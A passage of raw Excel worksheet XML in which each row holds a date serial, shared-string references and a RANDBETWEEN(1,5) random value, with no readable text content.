      <c r="A23482" s="1">
        <v>43017.06726851852</v>
      </c>
      <c r="C23482" t="s">
        <v>65</v>
      </c>
      <c r="E23482" s="2" t="s">
        <v>21252</v>
      </c>
      <c r="F23482">
        <f t="shared" ca="1" si="366"/>
        <v>2</v>
      </c>
    </row>
    <row r="23483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23483" s="1">
        <v>43017.060590277775</v>
      </c>
      <c r="C23483" t="s">
        <v>318</v>
      </c>
      <c r="E23483" t="s">
        <v>21253</v>
      </c>
      <c r="F23483">
        <f t="shared" ca="1" si="366"/>
        <v>5</v>
      </c>
    </row>
    <row r="23484" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23484" s="1">
        <v>43016.98710648148</v>
      </c>
      <c r="C23484" t="s">
        <v>140</v>
      </c>
      <c r="D23484" t="s">
        <v>141</v>
      </c>
      <c r="E23484" s="2" t="s">
        <v>21254</v>
      </c>
      <c r="F23484">
        <f t="shared" ca="1" si="366"/>
        <v>2</v>
      </c>
    </row>
    <row r="23485" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23485" s="1">
        <v>43016.968819444446</v>
      </c>
      <c r="C23485" t="s">
        <v>2187</v>
      </c>
      <c r="D23485" t="s">
        <v>330</v>
      </c>
      <c r="E23485" s="2" t="s">
        <v>21255</v>
      </c>
      <c r="F23485">
        <f t="shared" ca="1" si="366"/>
        <v>1</v>
      </c>
    </row>
    <row r="23486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23486" s="1">
        <v>43016.941261574073</v>
      </c>
      <c r="C23486" t="s">
        <v>10</v>
      </c>
      <c r="D23486" t="s">
        <v>11</v>
      </c>
      <c r="E23486" t="s">
        <v>21256</v>
      </c>
      <c r="F23486">
        <f t="shared" ca="1" si="366"/>
        <v>1</v>
      </c>
    </row>
    <row r="23487" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23487" s="1">
        <v>43016.875844907408</v>
      </c>
      <c r="C23487" t="s">
        <v>140</v>
      </c>
      <c r="D23487" t="s">
        <v>141</v>
      </c>
      <c r="E23487" s="2" t="s">
        <v>21257</v>
      </c>
      <c r="F23487">
        <f t="shared" ca="1" si="366"/>
        <v>3</v>
      </c>
    </row>
    <row r="23488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23488" s="1">
        <v>43016.736863425926</v>
      </c>
      <c r="C23488" t="s">
        <v>97</v>
      </c>
      <c r="E23488" t="s">
        <v>21258</v>
      </c>
      <c r="F23488">
        <f t="shared" ca="1" si="366"/>
        <v>2</v>
      </c>
    </row>
    <row r="23489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23489" s="1">
        <v>43016.711597222224</v>
      </c>
      <c r="C23489" t="s">
        <v>6</v>
      </c>
      <c r="D23489" t="s">
        <v>82</v>
      </c>
      <c r="E23489" t="s">
        <v>21259</v>
      </c>
      <c r="F23489">
        <f t="shared" ca="1" si="366"/>
        <v>5</v>
      </c>
    </row>
    <row r="23490" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23490" s="1">
        <v>43015.956967592596</v>
      </c>
      <c r="C23490" t="s">
        <v>2147</v>
      </c>
      <c r="D23490" t="s">
        <v>667</v>
      </c>
      <c r="E23490" s="2" t="s">
        <v>21260</v>
      </c>
      <c r="F23490">
        <f t="shared" ref="F23490:F23553" ca="1" si="367">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="23491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23491" s="1">
        <v>43015.849340277775</v>
      </c>
      <c r="C23491" t="s">
        <v>10</v>
      </c>
      <c r="D23491" t="s">
        <v>80</v>
      </c>
      <c r="E23491" t="s">
        <v>21261</v>
      </c>
      <c r="F23491">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23492" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23492" s="1">
        <v>43015.629733796297</v>
      </c>
      <c r="C23492" t="s">
        <v>463</v>
      </c>
      <c r="D23492" t="s">
        <v>56</v>
      </c>
      <c r="E23492" s="2" t="s">
        <v>21262</v>
      </c>
      <c r="F23492">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23493" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23493" s="1">
        <v>43015.065312500003</v>
      </c>
      <c r="C23493" t="s">
        <v>8588</v>
      </c>
      <c r="D23493" t="s">
        <v>821</v>
      </c>
      <c r="E23493" s="2" t="s">
        <v>21263</v>
      </c>
      <c r="F23493">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23494" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23494" s="1">
        <v>43015.062048611115</v>
      </c>
      <c r="C23494" t="s">
        <v>41</v>
      </c>
      <c r="E23494" s="2" t="s">
        <v>21264</v>
      </c>
      <c r="F23494">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23495" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23495" s="1">
        <v>43015.053576388891</v>
      </c>
      <c r="C23495" t="s">
        <v>41</v>
      </c>
      <c r="E23495" s="2" t="s">
        <v>21265</v>
      </c>
      <c r="F23495">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23496" s="1">
        <v>43014.775416666664</v>
      </c>
      <c r="C23496" t="s">
        <v>10</v>
      </c>
      <c r="D23496" t="s">
        <v>381</v>
      </c>
      <c r="E23496" t="s">
        <v>21266</v>
      </c>
      <c r="F23496">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23497" s="1">
        <v>43014.748402777775</v>
      </c>
      <c r="C23497" t="s">
        <v>10</v>
      </c>
      <c r="D23497" t="s">
        <v>89</v>
      </c>
      <c r="E23497" t="s">
        <v>21267</v>
      </c>
      <c r="F23497">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23498" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23498" s="1">
        <v>43014.723634259259</v>
      </c>
      <c r="C23498" t="s">
        <v>10</v>
      </c>
      <c r="D23498" t="s">
        <v>885</v>
      </c>
      <c r="E23498" s="2" t="s">
        <v>21268</v>
      </c>
      <c r="F23498">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23499" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23499" s="1">
        <v>43014.712592592594</v>
      </c>
      <c r="C23499" t="s">
        <v>2545</v>
      </c>
      <c r="D23499" t="s">
        <v>52</v>
      </c>
      <c r="E23499" s="2" t="s">
        <v>21269</v>
      </c>
      <c r="F23499">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23500" s="1">
        <v>43014.708599537036</v>
      </c>
      <c r="C23500" t="s">
        <v>10</v>
      </c>
      <c r="D23500" t="s">
        <v>178</v>
      </c>
      <c r="E23500" t="s">
        <v>21270</v>
      </c>
      <c r="F23500">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23501" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23501" s="1">
        <v>43014.666354166664</v>
      </c>
      <c r="C23501" t="s">
        <v>10</v>
      </c>
      <c r="D23501" t="s">
        <v>112</v>
      </c>
      <c r="E23501" s="2" t="s">
        <v>21271</v>
      </c>
      <c r="F23501">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23502" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23502" s="1">
        <v>43014.638391203705</v>
      </c>
      <c r="C23502" t="s">
        <v>243</v>
      </c>
      <c r="D23502" t="s">
        <v>41</v>
      </c>
      <c r="E23502" s="2" t="s">
        <v>21272</v>
      </c>
      <c r="F23502">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23503" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A23503" s="1">
        <v>43014.621724537035</v>
      </c>
      <c r="C23503" t="s">
        <v>10</v>
      </c>
      <c r="D23503" t="s">
        <v>6</v>
      </c>
      <c r="E23503" s="2" t="s">
        <v>21273</v>
      </c>
      <c r="F23503">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23504" s="1">
        <v>43014.617199074077</v>
      </c>
      <c r="C23504" t="s">
        <v>10</v>
      </c>
      <c r="D23504" t="s">
        <v>112</v>
      </c>
      <c r="E23504" t="s">
        <v>21274</v>
      </c>
      <c r="F23504">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23505" s="1">
        <v>43014.599027777775</v>
      </c>
      <c r="C23505" t="s">
        <v>10</v>
      </c>
      <c r="D23505" t="s">
        <v>222</v>
      </c>
      <c r="E23505" t="s">
        <v>21275</v>
      </c>
      <c r="F23505">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23506" s="1">
        <v>43014.589826388888</v>
      </c>
      <c r="C23506" t="s">
        <v>10</v>
      </c>
      <c r="D23506" t="s">
        <v>6</v>
      </c>
      <c r="E23506" t="s">
        <v>21276</v>
      </c>
      <c r="F23506">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23507" s="1">
        <v>43014.560972222222</v>
      </c>
      <c r="C23507" t="s">
        <v>10</v>
      </c>
      <c r="D23507" t="s">
        <v>251</v>
      </c>
      <c r="E23507" t="s">
        <v>21277</v>
      </c>
      <c r="F23507">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23508" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23508" s="1">
        <v>43014.554826388892</v>
      </c>
      <c r="C23508" t="s">
        <v>10</v>
      </c>
      <c r="D23508" t="s">
        <v>6</v>
      </c>
      <c r="E23508" s="2" t="s">
        <v>21278</v>
      </c>
      <c r="F23508">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23509" s="1">
        <v>43014.55395833333</v>
      </c>
      <c r="C23509" t="s">
        <v>10</v>
      </c>
      <c r="D23509" t="s">
        <v>244</v>
      </c>
      <c r="E23509" t="s">
        <v>21279</v>
      </c>
      <c r="F23509">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23510" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23510" s="1">
        <v>43014.548831018517</v>
      </c>
      <c r="C23510" t="s">
        <v>10</v>
      </c>
      <c r="D23510" t="s">
        <v>20</v>
      </c>
      <c r="E23510" s="2" t="s">
        <v>21280</v>
      </c>
      <c r="F23510">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23511" s="1">
        <v>43014.497766203705</v>
      </c>
      <c r="C23511" t="s">
        <v>2104</v>
      </c>
      <c r="E23511" t="s">
        <v>21281</v>
      </c>
      <c r="F23511">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23512" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23512" s="1">
        <v>43014.491076388891</v>
      </c>
      <c r="C23512" t="s">
        <v>10</v>
      </c>
      <c r="D23512" t="s">
        <v>632</v>
      </c>
      <c r="E23512" s="2" t="s">
        <v>21282</v>
      </c>
      <c r="F23512">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23513" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23513" s="1">
        <v>43014.417222222219</v>
      </c>
      <c r="C23513" t="s">
        <v>71</v>
      </c>
      <c r="E23513" s="2" t="s">
        <v>21283</v>
      </c>
      <c r="F23513">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23514" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23514" s="1">
        <v>43014.416805555556</v>
      </c>
      <c r="C23514" t="s">
        <v>41</v>
      </c>
      <c r="E23514" s="2" t="s">
        <v>21284</v>
      </c>
      <c r="F23514">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23515" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23515" s="1">
        <v>43014.40520833333</v>
      </c>
      <c r="C23515" t="s">
        <v>222</v>
      </c>
      <c r="E23515" s="2" t="s">
        <v>21285</v>
      </c>
      <c r="F23515">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23516" s="1">
        <v>43014.403298611112</v>
      </c>
      <c r="C23516" t="s">
        <v>559</v>
      </c>
      <c r="E23516" t="s">
        <v>21286</v>
      </c>
      <c r="F23516">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23517" s="1">
        <v>43014.392060185186</v>
      </c>
      <c r="C23517" t="s">
        <v>48</v>
      </c>
      <c r="E23517" t="s">
        <v>21287</v>
      </c>
      <c r="F23517">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23518" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23518" s="1">
        <v>43014.378240740742</v>
      </c>
      <c r="C23518" t="s">
        <v>10</v>
      </c>
      <c r="D23518" t="s">
        <v>36</v>
      </c>
      <c r="E23518" t="s">
        <v>21288</v>
      </c>
      <c r="F23518">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23519" s="1">
        <v>43014.377488425926</v>
      </c>
      <c r="C23519" t="s">
        <v>10</v>
      </c>
      <c r="D23519" t="s">
        <v>36</v>
      </c>
      <c r="F23519">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23520" s="1">
        <v>43014.349722222221</v>
      </c>
      <c r="C23520" t="s">
        <v>471</v>
      </c>
      <c r="E23520" t="s">
        <v>21289</v>
      </c>
      <c r="F23520">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23521" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23521" s="1">
        <v>43014.239999999998</v>
      </c>
      <c r="C23521" t="s">
        <v>2140</v>
      </c>
      <c r="E23521" s="2" t="s">
        <v>21290</v>
      </c>
      <c r="F23521">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23522" s="1">
        <v>43014.23777777778</v>
      </c>
      <c r="C23522" t="s">
        <v>253</v>
      </c>
      <c r="E23522" t="s">
        <v>21291</v>
      </c>
      <c r="F23522">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23523" s="1">
        <v>43014.228842592594</v>
      </c>
      <c r="C23523" t="s">
        <v>41</v>
      </c>
      <c r="E23523" t="s">
        <v>21292</v>
      </c>
      <c r="F23523">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23524" s="1">
        <v>43014.223194444443</v>
      </c>
      <c r="C23524" t="s">
        <v>189</v>
      </c>
      <c r="E23524" t="s">
        <v>21293</v>
      </c>
      <c r="F23524">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23525" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23525" s="1">
        <v>43014.213287037041</v>
      </c>
      <c r="C23525" t="s">
        <v>73</v>
      </c>
      <c r="E23525" s="2" t="s">
        <v>21294</v>
      </c>
      <c r="F23525">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23526" s="1">
        <v>43014.209965277776</v>
      </c>
      <c r="C23526" t="s">
        <v>48</v>
      </c>
      <c r="E23526" t="s">
        <v>21295</v>
      </c>
      <c r="F23526">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23527" s="1">
        <v>43014.208425925928</v>
      </c>
      <c r="C23527" t="s">
        <v>173</v>
      </c>
      <c r="E23527" t="s">
        <v>21296</v>
      </c>
      <c r="F23527">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23528" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23528" s="1">
        <v>43014.144918981481</v>
      </c>
      <c r="C23528" t="s">
        <v>71</v>
      </c>
      <c r="E23528" s="2" t="s">
        <v>21297</v>
      </c>
      <c r="F23528">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23529" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23529" s="1">
        <v>43014.136840277781</v>
      </c>
      <c r="C23529" t="s">
        <v>71</v>
      </c>
      <c r="E23529" s="2" t="s">
        <v>21298</v>
      </c>
      <c r="F23529">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23530" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23530" s="1">
        <v>43014.104155092595</v>
      </c>
      <c r="C23530" t="s">
        <v>41</v>
      </c>
      <c r="E23530" t="s">
        <v>21299</v>
      </c>
      <c r="F23530">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23531" s="1">
        <v>43014.097650462965</v>
      </c>
      <c r="C23531" t="s">
        <v>41</v>
      </c>
      <c r="E23531" t="s">
        <v>21300</v>
      </c>
      <c r="F23531">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23532" s="1">
        <v>43014.048414351855</v>
      </c>
      <c r="C23532" t="s">
        <v>29</v>
      </c>
      <c r="E23532" t="s">
        <v>21301</v>
      </c>
      <c r="F23532">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23533" s="1">
        <v>43014.048275462963</v>
      </c>
      <c r="C23533" t="s">
        <v>29</v>
      </c>
      <c r="E23533" t="s">
        <v>21301</v>
      </c>
      <c r="F23533">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23534" s="1">
        <v>43014.048078703701</v>
      </c>
      <c r="C23534" t="s">
        <v>29</v>
      </c>
      <c r="E23534" t="s">
        <v>21301</v>
      </c>
      <c r="F23534">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23535" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23535" s="1">
        <v>43014.016956018517</v>
      </c>
      <c r="C23535" t="s">
        <v>140</v>
      </c>
      <c r="D23535" t="s">
        <v>847</v>
      </c>
      <c r="E23535" s="2" t="s">
        <v>21302</v>
      </c>
      <c r="F23535">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23536" s="1">
        <v>43013.992800925924</v>
      </c>
      <c r="C23536" t="s">
        <v>41</v>
      </c>
      <c r="F23536">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23537" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23537" s="1">
        <v>43013.974641203706</v>
      </c>
      <c r="C23537" t="s">
        <v>41</v>
      </c>
      <c r="E23537" s="2" t="s">
        <v>21303</v>
      </c>
      <c r="F23537">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23538" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23538" s="1">
        <v>43013.894976851851</v>
      </c>
      <c r="C23538" t="s">
        <v>73</v>
      </c>
      <c r="E23538" s="2" t="s">
        <v>21304</v>
      </c>
      <c r="F23538">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23539" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23539" s="1">
        <v>43013.844224537039</v>
      </c>
      <c r="C23539" t="s">
        <v>10</v>
      </c>
      <c r="D23539" t="s">
        <v>6</v>
      </c>
      <c r="E23539" s="2" t="s">
        <v>21305</v>
      </c>
      <c r="F23539">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23540" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23540" s="1">
        <v>43013.797337962962</v>
      </c>
      <c r="C23540" t="s">
        <v>10</v>
      </c>
      <c r="D23540" t="s">
        <v>52</v>
      </c>
      <c r="E23540" s="2" t="s">
        <v>21306</v>
      </c>
      <c r="F23540">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23541" s="1">
        <v>43013.74863425926</v>
      </c>
      <c r="C23541" t="s">
        <v>10</v>
      </c>
      <c r="D23541" t="s">
        <v>89</v>
      </c>
      <c r="E23541" t="s">
        <v>21307</v>
      </c>
      <c r="F23541">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23542" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23542" s="1">
        <v>43013.744664351849</v>
      </c>
      <c r="C23542" t="s">
        <v>10</v>
      </c>
      <c r="D23542" t="s">
        <v>178</v>
      </c>
      <c r="E23542" s="2" t="s">
        <v>21308</v>
      </c>
      <c r="F23542">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23543" s="1">
        <v>43013.726180555554</v>
      </c>
      <c r="C23543" t="s">
        <v>10</v>
      </c>
      <c r="D23543" t="s">
        <v>271</v>
      </c>
      <c r="E23543" t="s">
        <v>21309</v>
      </c>
      <c r="F23543">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23544" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23544" s="1">
        <v>43013.71634259259</v>
      </c>
      <c r="C23544" t="s">
        <v>1325</v>
      </c>
      <c r="E23544" s="2" t="s">
        <v>21310</v>
      </c>
      <c r="F23544">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23545" s="1">
        <v>43013.671539351853</v>
      </c>
      <c r="C23545" t="s">
        <v>10</v>
      </c>
      <c r="D23545" t="s">
        <v>163</v>
      </c>
      <c r="E23545" t="s">
        <v>21311</v>
      </c>
      <c r="F23545">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23546" s="1">
        <v>43013.669212962966</v>
      </c>
      <c r="C23546" t="s">
        <v>10</v>
      </c>
      <c r="D23546" t="s">
        <v>36</v>
      </c>
      <c r="E23546" t="s">
        <v>21312</v>
      </c>
      <c r="F23546">
        <f t="shared" ca="1" si="367"/>
        <v>3</v>
      </c>
    </row>
    <row r="23547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23547" s="1">
        <v>43013.657696759263</v>
      </c>
      <c r="C23547" t="s">
        <v>6</v>
      </c>
      <c r="D23547" t="s">
        <v>25</v>
      </c>
      <c r="E23547" t="s">
        <v>21313</v>
      </c>
      <c r="F23547">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23548" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23548" s="1">
        <v>43013.651342592595</v>
      </c>
      <c r="C23548" t="s">
        <v>3443</v>
      </c>
      <c r="D23548" t="s">
        <v>11</v>
      </c>
      <c r="E23548" s="2" t="s">
        <v>21314</v>
      </c>
      <c r="F23548">
        <f t="shared" ca="1" si="367"/>
        <v>1</v>
      </c>
    </row>
    <row r="23549" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23549" s="1">
        <v>43013.628287037034</v>
      </c>
      <c r="C23549" t="s">
        <v>71</v>
      </c>
      <c r="D23549" t="s">
        <v>312</v>
      </c>
      <c r="E23549" s="2" t="s">
        <v>21315</v>
      </c>
      <c r="F23549">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23550" s="1">
        <v>43013.615891203706</v>
      </c>
      <c r="C23550" t="s">
        <v>10</v>
      </c>
      <c r="D23550" t="s">
        <v>112</v>
      </c>
      <c r="E23550" t="s">
        <v>21316</v>
      </c>
      <c r="F23550">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23551" s="1">
        <v>43013.609456018516</v>
      </c>
      <c r="C23551" t="s">
        <v>10</v>
      </c>
      <c r="D23551" t="s">
        <v>89</v>
      </c>
      <c r="E23551" t="s">
        <v>21317</v>
      </c>
      <c r="F23551">
        <f t="shared" ca="1" si="367"/>
        <v>2</v>
      </c>
    </row>
    <row r="23552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23552" s="1">
        <v>43013.57671296296</v>
      </c>
      <c r="C23552" t="s">
        <v>10</v>
      </c>
      <c r="E23552" t="s">
        <v>21318</v>
      </c>
      <c r="F23552">
        <f t="shared" ca="1" si="367"/>
        <v>5</v>
      </c>
    </row>
    <row r="23553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23553" s="1">
        <v>43013.555810185186</v>
      </c>
      <c r="C23553" t="s">
        <v>559</v>
      </c>
      <c r="E23553" t="s">
        <v>21319</v>
      </c>
      <c r="F23553">
        <f t="shared" ca="1" si="367"/>
        <v>4</v>
      </c>
    </row>
    <row r="23554" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23554" s="1">
        <v>43013.528900462959</v>
      </c>
      <c r="C23554" t="s">
        <v>10</v>
      </c>
      <c r="D23554" t="s">
        <v>36</v>
      </c>
      <c r="E23554" s="2" t="s">
        <v>21320</v>
      </c>
      <c r="F23554">
        <f t="shared" ref="F23554:F23617" ca="1" si="368">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="23555" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23555" s="1">
        <v>43013.502800925926</v>
      </c>
      <c r="C23555" t="s">
        <v>41</v>
      </c>
      <c r="E23555" s="2" t="s">
        <v>21321</v>
      </c>
      <c r="F23555">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23556" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23556" s="1">
        <v>43013.501342592594</v>
      </c>
      <c r="C23556" t="s">
        <v>41</v>
      </c>
      <c r="E23556" s="2" t="s">
        <v>21322</v>
      </c>
      <c r="F23556">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23557" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23557" s="1">
        <v>43013.495138888888</v>
      </c>
      <c r="C23557" t="s">
        <v>280</v>
      </c>
      <c r="E23557" s="2" t="s">
        <v>21323</v>
      </c>
      <c r="F23557">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23558" s="1">
        <v>43013.488506944443</v>
      </c>
      <c r="C23558" t="s">
        <v>41</v>
      </c>
      <c r="E23558" t="s">
        <v>6267</v>
      </c>
      <c r="F23558">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23559" s="1">
        <v>43013.487233796295</v>
      </c>
      <c r="C23559" t="s">
        <v>776</v>
      </c>
      <c r="E23559" t="s">
        <v>21324</v>
      </c>
      <c r="F23559">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23560" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23560" s="1">
        <v>43013.481215277781</v>
      </c>
      <c r="C23560" t="s">
        <v>65</v>
      </c>
      <c r="E23560" s="2" t="s">
        <v>21325</v>
      </c>
      <c r="F23560">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
